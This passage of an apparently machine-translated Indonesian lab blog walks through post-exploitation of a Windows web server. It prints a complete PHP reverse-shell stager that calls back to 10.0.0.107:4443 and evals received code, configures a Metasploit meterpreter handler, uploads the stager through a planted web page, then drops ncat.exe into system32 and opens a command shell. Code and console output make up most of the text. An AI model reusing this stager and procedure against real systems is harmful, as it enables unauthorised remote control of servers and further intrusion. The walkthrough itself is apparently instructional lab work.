[email protected]:~$ cat tmp.php | cut --characters 3- > server.php [email protected]:~$ cat server.php <?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Selanjutnya kita memuat “msfconsole” dan mengkonfigurasi “multi/handler”
msf5 > use multi/handler msf5 exploit(multi/handler) > set LHOST 10.0.0.107 LHOST => 10.0.0.107 msf5 exploit(multi/handler) > set LPORT 4443 LPORT => 443 msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp
Pastikan semuanya baik-baik saja.
msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.0.107 yes The listen address (an interface may be specified) LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
Mulai proses mendengarkan dengan menjalankan “exploit”
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.107:4443
Verifikasi port mendengarkan di sistem lokal kami.
[email protected]:~$ sudo ss --numeric --listening --tcp --process sudo: unable to resolve host securtynik: Temporary failure in name resolution State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 256 10.0.0.107:4443 0.0.0.0:* users:(("ruby",pid=3354,fd=9))
Sepertinya kita baik untuk pergi.
Sekarang sepertinya kita memiliki pengaturan lingkungan penyerang, sekarang mari kita tinjau kembali stager kita yang telah diunggah sebelumnya ketika kita mendapatkan “os-shell”. Stager di-host di “http://10.0.0.108:80/tmpuevkq.php” seperti yang kita lihat sebelumnya.
Jika sekarang kami membuka browser kami dan menempelkan URL itu, kami melihat:
Saya kemudian mengklik browse dan memilih skrip “server.php” saya.
Sekarang mari kita jalankan skrip kita.
Pada titik ini, jika kita sekarang beralih ke “msfconsole” kita, kita melihat
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.107:4443 [*] Sending stage (38288 bytes) to 10.0.0.108 [*] Meterpreter session 1 opened (10.0.0.107:4443 -> 10.0.0.108:6375) at 2020-06-24 17:03:23 -0400 meterpreter >
Sepertinya kami berhasil mendapatkan sesi. Jalankan “sysinfo”
meterpreter > sysinfo Computer : SECURITYNIK-WIN OS : Windows NT SECURITYNIK-WIN 10.0 build 16299 (Windows 10) i586 Meterpreter : php/windows
Pada titik ini, kami sekarang dapat mengunggah alat tambahan. Di sini saya mengunggah ncat.exe
meterpreter > upload ncat.exe c:\windows\system32\ [*] uploading : ncat.exe -> c:windowssystem32 [*] uploaded : ncat.exe -> c:windowssystem32\ncat.exe
Sebelum kita pergi, mari kita ambil cangkangnya.
meterpreter > shell Process 3864 created. Channel 6 created. Microsoft Windows [Version 10.0.16299.125] (c) 2017 Microsoft Corporation. All rights reserved. C:WindowsSystem32>
Saya serahkan pada imajinasi Anda, apa yang Anda lakukan mulai sekarang. Saya akan menutup posting ini dan sampai jumpa di posting analisis log.